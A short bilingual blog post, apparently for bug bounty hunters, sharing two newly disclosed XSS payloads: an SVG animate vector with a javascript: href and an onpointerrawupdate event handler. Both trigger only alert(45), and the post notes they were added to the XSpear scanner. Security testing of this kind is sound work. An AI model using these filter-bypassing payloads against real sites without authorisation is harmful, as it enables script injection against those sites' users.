First new XSS Payload of 2020(svg animate, onpointerrawupdate)

Hi hackers and bugbounty hunter! Recently, two previously unknown XSS Payloads were disclosure one after another. It’s not a payload that’s very difficult to understand, so I’ll share it briefly! 최근 기존에 알려지지 않은 XSS Payload 2개가 연달아 공개됬습니다. 이해에 큰 어려움이 있는 페이로드는 아니니, 간략하게만 내용 공유할게요!

SVG Aniamte XSS

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(45)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

onpointerrawupdate event handler for XSS

<div onpointerrawupdate=alert(45)>xss</div>

Updated XSpear (1.3.3)

I added this two payload in xspear. Please use it after the update. 2일전인가.. XSpear에는 반영해뒀습니다.

https://github.com/hahwul/XSpear/issues/49 https://github.com/hahwul/XSpear/issues/50

1.3.3으로 업데이트 후 사용하시면 기본적으로 포함됩니다 : )

gem update XSpear

Reference

https://twitter.com/XssPayloads/status/1225426346366701568 https://portswigger.net/research/svg-animate-xss-vector